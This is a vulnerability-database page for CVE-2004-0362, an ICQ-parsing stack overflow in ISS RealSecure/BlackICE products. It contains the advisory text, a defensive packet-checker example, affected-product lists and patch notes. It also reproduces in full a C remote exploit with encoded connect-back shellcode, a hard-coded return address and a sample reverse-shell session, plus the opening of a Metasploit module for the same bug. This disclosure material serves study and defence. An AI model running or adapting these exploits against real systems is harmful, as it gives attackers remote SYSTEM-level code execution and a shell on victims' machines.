CVE-2004-0362
CVSS 7.5
Published: 2004-04-15 00:00:00
Revised: 2016-10-17 22:44:39

[Original] Multiple stack-based buffer overflows in the ICQ parsing routines of the ISS Protocol Analysis Module (PAM) component, as used in various RealSecure, Proventia, and BlackICE products, allow remote attackers to execute arbitrary code via a SRV_MULTI response containing a SRV_USER_ONLINE response packet and a SRV_META_USER response packet with long (1) nickname, (2) firstname, (3) lastname, or (4) email address fields, as exploited by the Witty worm.


[CNNVD] ISS RealSecure/BlackICE Protocol Analysis Module ICQ Response Handling Buffer Overflow Vulnerability (CNNVD-200404-038)

        
The ISS RealSecure/BlackICE Protocol Analysis Module (PAM) parses network protocols for further analysis and attack detection, and is used in all current ISS intrusion detection products.
A buffer overflow exists in the function of the ISS RealSecure/BlackICE PAM that monitors ICQ server responses. A remote attacker can exploit it to carry out a remote buffer overflow attack and may execute arbitrary instructions on the system with SYSTEM privileges.
When the PAM ICQ response handler receives a SRV_META_USER response, it assigns a pointer to a structure for the contained Nickname, firstname, lastname and EMAIL address fields; a subsequent function temporarily copies this data into a 512-byte buffer without any length check. To reach the affected functions, an attacker only needs to construct a SRV_USER_ONLINE response containing two nested response packets. The attacker can forge data frames and send them to networks, devices or hosts protected by ISS products.
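The structure just described (a SRV_MULTI response carrying a SRV_USER_ONLINE and a SRV_META_USER sub-response, whose four length-prefixed strings PAM copies into a 512-byte stack buffer) as a bounded checker that a packet filter or IDS could apply, added here as example code and not taken from ISS's PAM or from either exploit on this page. It assumes the packet layout annotated in the C exploit below (21-byte ICQ v5 header, one-byte response count, a two-byte size before each sub-response, subcommand and success bytes before the strings); the constants, `copy_field`, and the constructed sample packets are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ICQ_HDR_LEN     21      /* ver(2) pad(1) session(4) cmd(2) seq1(2) seq2(2) uin(4) checkcode(4) */
#define ICQ_VERSION     5
#define SRV_MULTI       0x0212
#define SRV_USER_ONLINE 0x006e
#define SRV_META_USER   0x03de
#define PAM_FIELD_BUF   512     /* size of the temporary stack buffer named in the advisory */

enum icq_verdict { ICQ_OK = 0, ICQ_TRUNCATED, ICQ_OVERSIZED_FIELD, ICQ_NOT_SRV_MULTI };
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | ((uint16_t)p[1] << 8)); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }

/* Bounded form of the copy the advisory says PAM does unchecked: a string is copied only if it
 * fits the 512-byte buffer with its NUL. Returns wire bytes consumed, 0 if it runs past the packet. */
static size_t copy_field(const uint8_t *p, size_t avail, char out[PAM_FIELD_BUF], int *oversized)
{
    if (avail < 2) return 0;
    size_t n = rd16(p);
    if (n + 2 > avail) return 0;
    if (n >= PAM_FIELD_BUF) { *oversized = 1; return n + 2; }   /* flag and skip; PAM memcpy'd here */
    memcpy(out, p + 2, n); out[n] = '\0';
    return n + 2;
}

/* SRV_META_USER: header, subcommand(2), success(1), then nick, first, last, email (16-bit LE lengths). */
static enum icq_verdict check_meta_user(const uint8_t *p, size_t len)
{
    char field[PAM_FIELD_BUF];
    int oversized = 0;
    size_t off = ICQ_HDR_LEN + 3;
    if (len < off) return ICQ_TRUNCATED;
    for (int i = 0; i < 4; i++) {
        size_t used = copy_field(p + off, len - off, field, &oversized);
        if (used == 0) return ICQ_TRUNCATED;
        off += used;
    }
    return oversized ? ICQ_OVERSIZED_FIELD : ICQ_OK;
}

/* Walk a SRV_MULTI response (header, one-byte count, then size-prefixed sub-responses, as
 * annotated in the C exploit on this page) and check every nested SRV_META_USER. */
enum icq_verdict check_srv_multi(const uint8_t *pkt, size_t len)
{
    if (len < ICQ_HDR_LEN + 1) return ICQ_TRUNCATED;
    if (rd16(pkt) != ICQ_VERSION || rd16(pkt + 7) != SRV_MULTI) return ICQ_NOT_SRV_MULTI;
    size_t off = ICQ_HDR_LEN + 1;
    for (unsigned i = 0; i < pkt[ICQ_HDR_LEN]; i++) {
        if (len - off < 2) return ICQ_TRUNCATED;
        size_t sub = rd16(pkt + off); off += 2;
        if (sub < ICQ_HDR_LEN || sub > len - off) return ICQ_TRUNCATED;
        if (rd16(pkt + off + 7) == SRV_META_USER) {
            enum icq_verdict v = check_meta_user(pkt + off, sub);
            if (v != ICQ_OK) return v;
        }
        off += sub;
    }
    return ICQ_OK;
}

/* Constructed test vector, not a capture: SRV_MULTI carrying a 44-byte SRV_USER_ONLINE and a
 * SRV_META_USER with empty nick/first/last and an email of email_len 'A' bytes. 0 if it won't fit. */
size_t build_sample(uint8_t *buf, size_t cap, uint16_t email_len)
{
    size_t meta_len = ICQ_HDR_LEN + 3 + 2 * 4 + email_len;
    size_t total = ICQ_HDR_LEN + 1 + 2 + 44 + 2 + meta_len;
    if (total > cap || meta_len > 0xffff) return 0;
    memset(buf, 0, total);                                  /* zero session, UINs, lengths */
    uint8_t *p = buf;
    wr16(p, ICQ_VERSION); wr16(p + 7, SRV_MULTI); p += ICQ_HDR_LEN;
    *p++ = 2;                                               /* two sub-responses */
    wr16(p, 44); p += 2;
    wr16(p, ICQ_VERSION); wr16(p + 7, SRV_USER_ONLINE); p += 44;
    wr16(p, (uint16_t)meta_len); p += 2;
    wr16(p, ICQ_VERSION); wr16(p + 7, SRV_META_USER); p += ICQ_HDR_LEN + 3 + 2 * 3;
    wr16(p, email_len); memset(p + 2, 'A', email_len);
    return total;
}

/* Verdict for a constructed sample, with `drop` trailing bytes cut off to simulate truncation. */
enum icq_verdict verdict_for_sample(uint16_t email_len, size_t drop)
{
    static uint8_t buf[0x10200];
    size_t n = build_sample(buf, sizeof buf, email_len);
    return n > drop ? check_srv_multi(buf, n - drop) : ICQ_TRUNCATED;
}

int main(void)
{
    /* 0 = ok, 2 = oversized field; 542 (0x021e) is the email length the C exploit on this page sends */
    printf("10-byte email: %d, 542-byte email: %d\n", (int)verdict_for_sample(10, 0), (int)verdict_for_sample(542, 0));
    return 0;
}
```

`build_sample` and `verdict_for_sample` exist only to exercise the checker; any email, nickname, firstname or lastname field of 512 bytes or more is reported, which is exactly the condition the 512-byte buffer cannot hold.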
        

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/h:iss:proventia_a_series_xpu:22.2 (Internet Security Systems Proventia A Series XPU 22.2)
cpe:/h:iss:proventia_m_series_xpu:1.7 (Internet Security Systems Proventia M Series XPU 1.7)
cpe:/h:iss:proventia_a_series_xpu:22.3 (Internet Security Systems Proventia A Series XPU 22.3)
cpe:/h:iss:proventia_m_series_xpu:1.8 (Internet Security Systems Proventia M Series XPU 1.8)
cpe:/h:iss:proventia_a_series_xpu:22.8 (Internet Security Systems Proventia A Series XPU 22.8)
cpe:/h:iss:proventia_m_series_xpu:1.1 (Internet Security Systems Proventia M Series XPU 1.1)
cpe:/h:iss:proventia_a_series_xpu:22.9 (Internet Security Systems Proventia A Series XPU 22.9)
cpe:/h:iss:proventia_m_series_xpu:1.2 (Internet Security Systems Proventia M Series XPU 1.2)
cpe:/h:iss:proventia_a_series_xpu:22.6 (Internet Security Systems Proventia A Series XPU 22.6)
cpe:/h:iss:proventia_m_series_xpu:1.3 (Internet Security Systems Proventia M Series XPU 1.3)
cpe:/h:iss:proventia_a_series_xpu:22.7 (Internet Security Systems Proventia A Series XPU 22.7)
cpe:/h:iss:proventia_m_series_xpu:1.4 (Internet Security Systems Proventia M Series XPU 1.4)
cpe:/h:iss:proventia_m_series_xpu:1.9 (Internet Security Systems Proventia M Series XPU 1.9)
cpe:/h:iss:proventia_m_series_xpu:1.5 (Internet Security Systems Proventia M Series XPU 1.5)
cpe:/h:iss:proventia_m_series_xpu:1.6 (Internet Security Systems Proventia M Series XPU 1.6)
cpe:/a:iss:blackice_server_protection:3.6cbz (Internet Security Systems BlackICE Server Protection 3.6cbz)
cpe:/a:iss:blackice_server_protection:3.6cca (Internet Security Systems BlackICE Server Protection 3.6cca)
cpe:/a:iss:blackice_server_protection:3.6ccb (Internet Security Systems BlackICE Server Protection 3.6ccb)
cpe:/a:iss:realsecure_network_sensor:7.0:xpu_22.10
cpe:/h:iss:proventia_a_series_xpu:22.1 (Internet Security Systems Proventia A Series XPU 22.1)
cpe:/h:iss:proventia_a_series_xpu:22.4 (Internet Security Systems Proventia A Series XPU 22.4)
cpe:/h:iss:proventia_a_series_xpu:22.5 (Internet Security Systems Proventia A Series XPU 22.5)
cpe:/a:iss:realsecure_server_sensor:6.0.1_win_sr1.1
cpe:/a:iss:realsecure_server_sensor:6.5_win_sr3.1
cpe:/a:iss:realsecure_server_sensor:6.5::windows
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.9
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.6
cpe:/a:iss:realsecure_server_sensor:6.5_win_sr3.6
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.5
cpe:/a:iss:realsecure_server_sensor:6.5_win_sr3.9
cpe:/a:iss:realsecure_server_sensor:6.5_win_sr3.4
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.2
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.1
cpe:/a:iss:realsecure_server_sensor:6.5:sr3.3:windows
cpe:/a:iss:realsecure_server_sensor:6.5_win_sr3.5
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.8
cpe:/a:iss:realsecure_network_sensor:7.0:xpu_22.9
cpe:/a:iss:realsecure_server_sensor:6.5:sr3.2:windows
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.7
cpe:/a:iss:realsecure_network_sensor:7.0:xpu_22.4
cpe:/a:iss:realsecure_server_sensor:6.5_win_sr3.7
cpe:/a:iss:realsecure_server_sensor:6.5_win_sr3.8
cpe:/a:iss:realsecure_server_sensor:6.5_win_sr3.10
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.4
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.3
cpe:/a:iss:realsecure_server_sensor:6.0::windows
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.10
cpe:/a:iss:realsecure_server_sensor:7.0:xpu22.11
cpe:/a:iss:blackice_pc_protection:3.6cbz (Internet Security Systems BlackICE PC Protection 3.6cbz)
cpe:/a:iss:realsecure_guard:3.6ecf (Internet Security Systems RealSecure Guard 3.6ecf)
cpe:/a:iss:realsecure_server_sensor:6.0.1::windows
cpe:/a:iss:realsecure_guard:3.6ece (Internet Security Systems RealSecure Guard 3.6ece)
cpe:/a:iss:blackice_pc_protection:3.6ccb (Internet Security Systems BlackICE PC Protection 3.6ccb)
cpe:/a:iss:blackice_pc_protection:3.6cca (Internet Security Systems BlackICE PC Protection 3.6cca)
cpe:/a:iss:blackice_pc_protection:3.6ccc (Internet Security Systems BlackICE PC Protection 3.6ccc)
cpe:/a:iss:blackice_pc_protection:3.6ccf (Internet Security Systems BlackICE PC Protection 3.6ccf)
cpe:/a:iss:blackice_pc_protection:3.6cce (Internet Security Systems BlackICE PC Protection 3.6cce)
cpe:/a:iss:realsecure_guard:3.6ecd (Internet Security Systems RealSecure Guard 3.6ecd)
cpe:/a:iss:realsecure_guard:3.6ecc (Internet Security Systems RealSecure Guard 3.6ecc)
cpe:/a:iss:realsecure_guard:3.6ecb (Internet Security Systems RealSecure Guard 3.6ecb)
cpe:/a:iss:realsecure_guard:3.6eca (Internet Security Systems RealSecure Guard 3.6eca)
cpe:/a:iss:blackice_pc_protection:3.6ccd (Internet Security Systems BlackICE PC Protection 3.6ccd)
cpe:/a:iss:realsecure_guard:3.6ebz (Internet Security Systems RealSecure Guard 3.6ebz)
cpe:/a:iss:realsecure_desktop:7.0ebj (Internet Security Systems RealSecure Desktop 7.0ebj)
cpe:/a:iss:realsecure_desktop:7.0ebl (Internet Security Systems RealSecure Desktop 7.0ebl)
cpe:/a:iss:realsecure_desktop:7.0ebg (Internet Security Systems RealSecure Desktop 7.0ebg)
cpe:/a:iss:realsecure_desktop:7.0ebf (Internet Security Systems RealSecure Desktop 7.0ebf)
cpe:/a:iss:realsecure_desktop:7.0ebh (Internet Security Systems RealSecure Desktop 7.0ebh)
cpe:/h:iss:proventia_g_series_xpu:22.6 (Internet Security Systems Proventia G Series XPU 22.6)
cpe:/h:iss:proventia_g_series_xpu:22.7 (Internet Security Systems Proventia G Series XPU 22.7)
cpe:/h:iss:proventia_g_series_xpu:22.8 (Internet Security Systems Proventia G Series XPU 22.8)
cpe:/h:iss:proventia_g_series_xpu:22.9 (Internet Security Systems Proventia G Series XPU 22.9)
cpe:/a:iss:realsecure_sentry:3.6ece (Internet Security Systems RealSecure Sentry 3.6ece)
cpe:/h:iss:proventia_g_series_xpu:22.2 (Internet Security Systems Proventia G Series XPU 22.2)
cpe:/a:iss:realsecure_sentry:3.6ecf (Internet Security Systems RealSecure Sentry 3.6ecf)
cpe:/h:iss:proventia_g_series_xpu:22.3 (Internet Security Systems Proventia G Series XPU 22.3)
cpe:/h:iss:proventia_g_series_xpu:22.4 (Internet Security Systems Proventia G Series XPU 22.4)
cpe:/h:iss:proventia_g_series_xpu:22.5 (Internet Security Systems Proventia G Series XPU 22.5)
cpe:/h:iss:proventia_g_series_xpu:22.1 (Internet Security Systems Proventia G Series XPU 22.1)
cpe:/a:iss:realsecure_sentry:3.6eca (Internet Security Systems RealSecure Sentry 3.6eca)
cpe:/a:iss:realsecure_desktop:7.0eba (Internet Security Systems RealSecure Desktop 7.0eba)
cpe:/a:iss:realsecure_sentry:3.6ecb (Internet Security Systems RealSecure Sentry 3.6ecb)
cpe:/a:iss:realsecure_network_sensor:7.0:xpu_20.11
cpe:/a:iss:realsecure_sentry:3.6ecc (Internet Security Systems RealSecure Sentry 3.6ecc)
cpe:/a:iss:realsecure_sentry:3.6ecd (Internet Security Systems RealSecure Sentry 3.6ecd)
cpe:/a:iss:realsecure_network_sensor:7.0 (Internet Security Systems RealSecure Network Sensor 7.0)
cpe:/a:iss:realsecure_desktop:3.6ebz (Internet Security Systems RealSecure Desktop 3.6ebz)
cpe:/a:iss:realsecure_sentry:3.6ebz (Internet Security Systems RealSecure Sentry 3.6ebz)
cpe:/a:iss:realsecure_desktop:3.6ecb (Internet Security Systems RealSecure Desktop 3.6ecb)
cpe:/h:iss:proventia_a_series_xpu:22.10 (Internet Security Systems Proventia A Series XPU 22.10)
cpe:/a:iss:realsecure_desktop:3.6ece (Internet Security Systems RealSecure Desktop 3.6ece)
cpe:/a:iss:realsecure_desktop:3.6ecd (Internet Security Systems RealSecure Desktop 3.6ecd)
cpe:/a:iss:realsecure_desktop:3.6eca (Internet Security Systems RealSecure Desktop 3.6eca)
cpe:/a:iss:realsecure_desktop:7.0ebk (Internet Security Systems RealSecure Desktop 7.0ebk)
cpe:/a:iss:realsecure_desktop:3.6ecf (Internet Security Systems RealSecure Desktop 3.6ecf)
cpe:/a:iss:blackice_agent_server:3.6ebz (Internet Security Systems BlackICE Agent Server 3.6ebz)
cpe:/a:iss:blackice_server_protection:3.6cce (Internet Security Systems BlackICE Server Protection 3.6cce)
cpe:/a:iss:blackice_server_protection:3.6ccf (Internet Security Systems BlackICE Server Protection 3.6ccf)
cpe:/a:iss:blackice_server_protection:3.6ccc (Internet Security Systems BlackICE Server Protection 3.6ccc)
cpe:/a:iss:blackice_server_protection:3.6ccd (Internet Security Systems BlackICE Server Protection 3.6ccd)
cpe:/h:iss:proventia_a_series_xpu:20.11 (Internet Security Systems Proventia A Series XPU 20.11)
cpe:/a:iss:blackice_agent_server:3.6ecf (Internet Security Systems BlackICE Agent Server 3.6ecf)
cpe:/a:iss:blackice_agent_server:3.6ece (Internet Security Systems BlackICE Agent Server 3.6ece)
cpe:/h:iss:proventia_g_series_xpu:22.11 (Internet Security Systems Proventia G Series XPU 22.11)
cpe:/h:iss:proventia_g_series_xpu:22.10 (Internet Security Systems Proventia G Series XPU 22.10)
cpe:/a:iss:blackice_agent_server:3.6ecc (Internet Security Systems BlackICE Agent Server 3.6ecc)
cpe:/a:iss:blackice_agent_server:3.6ecb (Internet Security Systems BlackICE Agent Server 3.6ecb)
cpe:/a:iss:blackice_agent_server:3.6eca (Internet Security Systems BlackICE Agent Server 3.6eca)
cpe:/a:iss:blackice_agent_server:3.6ecd (Internet Security Systems BlackICE Agent Server 3.6ecd)

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0362
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0362
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200404-038
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=107965651712378&w=2
(UNKNOWN)  BUGTRAQ  20040318 EEYE: Internet Security Systems PAM ICQ Server Response Processing Vulnerability
http://www.ciac.org/ciac/bulletins/o-104.shtml
(UNKNOWN)  CIAC  O-104
http://www.eeye.com/html/Research/Advisories/AD20040318.html
(UNKNOWN)  EEYE  AD20040318
http://www.kb.cert.org/vuls/id/947254
(VENDOR_ADVISORY)  CERT-VN  VU#947254
http://www.securityfocus.com/bid/9913
(VENDOR_ADVISORY)  BID  9913
http://xforce.iss.net/xforce/alerts/id/166
(VENDOR_ADVISORY)  ISS  20040318 Vulnerability in ICQ Parsing in ISS Products
http://xforce.iss.net/xforce/xfdb/15442
(UNKNOWN)  XF  pam-icq-parsing-bo(15442)
http://xforce.iss.net/xforce/xfdb/15543
(UNKNOWN)  XF  witty-worm-propagation(15543)

- Vulnerability information

ISS RealSecure/BlackICE Protocol Analysis Module ICQ Response Handling Buffer Overflow Vulnerability
High  Unknown
2004-04-15 00:00:00 2006-06-15 00:00:00
Remote
        
        

- Advisories and patches

Vendor patches:
ISS
---
Upgrade to the following versions:
RealSecure Network 7.0, XPU 22.12
RealSecure Server Sensor 7.0 XPU 22.12
Proventia A Series XPU 22.12
Proventia G Series XPU 22.12
Proventia M Series XPU 1.10
RealSecure Desktop 7.0 ebm
RealSecure Desktop 3.6 ecg
RealSecure Guard 3.6 ecg
RealSecure Sentry 3.6 ecg
BlackICE Agent for Server 3.6 ecg
RealSecure Server Sensor 6.5 for Windows SR 3.11
BlackICE PC Protection 3.6 ccg
BlackICE Server Protection 3.6 ccg
Available from:

http://www.iss.net/download/

- Vulnerability information (168)

RealSecure / Blackice iss_pam1.dll Remote Overflow Exploit (EDBID:168)
Platform: windows  Type: remote
Date: 2004-03-28  Verified
Port: 0  Author: Sam
N/A [Download]
/* 557iss_pam_exp - RealSecure / Blackice ICQ iss_pam1.dll remote overflow exploit
*
* Copyright (c) SST 2004 All rights reserved.
*
* Public version
*
* code by Sam (Sam`@efnet) and 2004/03/26 
* <chen_xiaobo@venustech.com.cn>
* <Sam@0x557.org>
* 
* 
*
* Compile: gcc -o 557iss_pam_exp 557iss_pam_exp.c
*
* how works?
* [root@core exp]# ./557iss_pam_exp 192.168.10.2 192.168.10.169 5570
* 557iss_pam_exp - RealSecure / Blackice iss_pam1.dll remote overflow exploit
* - Sam
*
* # attack remote host: 192.168.10.2.
* # listen host: 192.168.10.169.
* # listen port: 5570.
* # send overflow udp datas
* # 1199 bytes send
* # done.
* # make sure we are in, dude :)
*
*
* [root@core root]# nc -vv -l -p 5570
* listening on [any] 5570 ...
* 192.168.10.2: inverse host lookup failed: Host name lookup failure
* connect to [192.168.10.169] from (UNKNOWN) [192.168.10.2] 3604
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\Program Files\ISS\BlackICE>
* C:\Program Files\ISS\BlackICE>
* C:\Program Files\ISS\BlackICE>
*
*
* some thanks/greets to:
* eeye (they find this bug :D), airsupply, kkqq, icbm, my gf :I
* and everyone else who's KNOW SST ;P
* http://0x557.org
*/

#include <stdio.h>
#include <unistd.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <assert.h>
#include <fcntl.h>
#include <sys/time.h>

char icq_header [] =
"\x05\x00" // ICQ VERSION
"\x00" // unused
"\x00\x00\x00\x00" // Session ID
"\x12\x02" // reply to SRV_MULTI_PACKET 
"\x00\x00\x00\x00" // SEQ_NUM1 and SEQ_NUM2
"\x00\x00\x00\x00" // UIN Your (the client's) UIN 
"\x00\x00\x00\x00" // CHECKCODE
"\x02" // SRV_MULTI Parameter Block 1 of 2
// Number of individual responses
"\x2c\x00" // Size of sub-response (44 bytes, little-endian) 

"\x05\x00" // ICQ VERSION
"\x00" // unused 
"\x00\x00\x00\x00" // Session ID
"\x6e\x00" // reply to SRV_USER_ONLINE
"\x00\x00\x00\x00" // SEQ_NUM1 and SEQ_NUM2
"\x00\x00\x00\x00" // UIN Your (the client's) UIN
"\x00\x00\x00\x00" // CHECKCODE
"\x00\x00\x00\x00" // UIN of user changing status
"\x01\x00\x00\x00" // Other user's IP address (1.0.0.0)
"\x00\x00\x00\x00" // Other user's direct-connect port (default)
"\x00"
"\x00\x00\x00\x00"
"\x00\x00\x00\x00"
"\x00\x00"
"\x41\x02" // SRV_MULTI Parameter Block 2 of 2 
// Size of sub-response (577 bytes)

"\x05\x00" // ICQ VERSION
"\x00" // unused 
"\x00\x00\x00\x00" // Session ID
"\xde\x03" // reply to SRV_META_USER
"\x00\x00\x00\x00" // SEQ_NUM1 and SEQ_NUM2
"\x00\x00\x00\x00" // UIN Your (the client's) UIN
"\x00\x00\x00\x00" // CHECKCODE
"\x00\x00\x00\x01" 
"\x00\x00\x01\x00"
"\x00\x01\x00\x00"
"\x1e\x02";


struct sockaddr_in addr, local;
char *bindHost = NULL;
unsigned short port;
/* 
* hsj's connect back shellcodes
*/
char shellcode [] =
/* decoder */
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
"\x93\x40\xe2\xfa"
/* code */
"\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"
"\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"
"\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"
"\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"
"\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"
"\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
"\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"
"\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"
"\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"
"\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"
"\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"
"\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"
"\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"
"\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"
"\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
"\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"
"\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"
"\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"
"\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"
"\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"
"\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
"\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
"\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
"\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
"\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
"\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50";




/* udpconnect:
* 
*/
int udpConnect (char *hostName)
{

struct hostent* host = NULL;
int sock = -1;

host = gethostbyname (hostName);
if (NULL == host) {
perror ("gethostbyname() failed");
return -1;
}

sock = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if ( -1 == sock) {
perror ("socket() failed\n");
return -1;
}

memset (&addr, 0x00, sizeof (addr));
addr.sin_addr = *(struct in_addr *) host->h_addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(random());

memset (&local, 0x00, sizeof (local));
local.sin_family = AF_INET;
local.sin_addr.s_addr = htonl (INADDR_ANY);
local.sin_port = htons(4000);


if (bind (sock, (struct sockaddr *) &local, sizeof(local)) != 0) {
perror ("bind error\n");
return -1;
}

return sock;
}

/* resolve listen host
*/
unsigned int resolve (char *name)
{
struct hostent *he;
unsigned int ip;

if ((ip = inet_addr (name)) == (-1)) {
if ((he = gethostbyname (name)) ==0 )
return 0;
memcpy (&ip, he->h_addr, 4);
}
return ip;
}


/*
* send datas
*/
int udp_send (int sock, char *buffer, int buff_len)
{
int ret;

ret = sendto (sock, buffer, buff_len, 0, (struct sockaddr *)&addr,
sizeof (struct sockaddr_in));
if (ret < 0) { // sendto() returns -1 on error; comparing an int against NULL was a bug
perror ("sendto failed\n");
return -1;
}

fprintf (stderr, "# %d bytes send\n", ret);

return ret;
}

/*
* send evil datas, fuck ISS's blackice.
*/
int do_sendudp_data (char *hostName)
{
unsigned int cb;
int sock;
char expbuf[1200];

memset (expbuf, 0x90, sizeof (expbuf));
memcpy (expbuf, icq_header, sizeof (icq_header) - 1);

/*
* jmp esp opcodes from iss_pam1.dll
*/
*(unsigned int *)&expbuf[637] = 0x5e077663;

if (!(cb = resolve (bindHost))) {
printf ("Unknown listen host\n");
return -1;
}
port = htons (port);
port ^= 0x9393;
cb ^= 0x93939393;

*(unsigned short *)&shellcode[330] = port;
*(unsigned int *)&shellcode[335] = cb;

memcpy (expbuf + 637 + 4, shellcode, strlen (shellcode));
if ((sock = udpConnect (hostName)) < 0) {
printf ("connect failed\n");
exit (-1);
}

fprintf (stderr, "# send overflow udp datas\n");
udp_send (sock, expbuf, sizeof (expbuf) - 1);

close (sock);
return 0;


}


/*
* just main . dude.
*/
int main (int argc, char **argv)
{
int new;
char *target = NULL;

fprintf (stderr, "557iss_pam_exp - RealSecure / Blackice iss_pam1.dll remote overflow exploit\n - Sam\n\n");
if (argc != 4) {
fprintf (stderr, "%s <hostname> <listenhost> <listen port>\n", argv[0]);
fprintf (stderr, "listenhost, port: connect back host and port\n\n");
return -1;
}

target = argv[1];
bindHost = argv[2];
port = atoi (argv[3]);

fprintf (stderr, "# attack remote host: %s. \n", target);
fprintf (stderr, "# listen host: %s. \n", bindHost);
fprintf (stderr, "# listen port: %d. \n", port);
do_sendudp_data (target);

fprintf (stderr, "# done.\n");

fprintf (stderr, "# make sure we are in, dude :)\n\n");

return 0;
}

// milw0rm.com [2004-03-28]
		

- Vulnerability information (16464)

ISS PAM.dll ICQ Parser Buffer Overflow (EDBID:16464)
Platform: windows  Type: remote
Date: 2010-09-20  Verified
Port: 0  Author: metasploit
N/A [Download]
##
# $Id: blackice_pam_icq.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'ISS PAM.dll ICQ Parser Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the ISS products that use
				the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation
				will result in arbitrary code execution as LocalSystem. This exploit
				only requires 1 UDP packet, which can be both spoofed and sent to a broadcast
				address.

				The ISS exception handler will recover the process after each overflow, giving
				us the ability to bruteforce the service and exploit it multiple times.
			},
			'Author'         => 'spoonm',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2004-0362'],
					['OSVDB', '4355'],
					['URL',   'http://www.eeye.com/html/Research/Advisories/AD20040318.html'],
					['URL',   'http://xforce.iss.net/xforce/alerts/id/166'],
				],
			'Payload'        =>
				{
					'Space'           => 504 -31 -4,
					'BadChars'        => "\x00",
					'MinNops'         => 0,
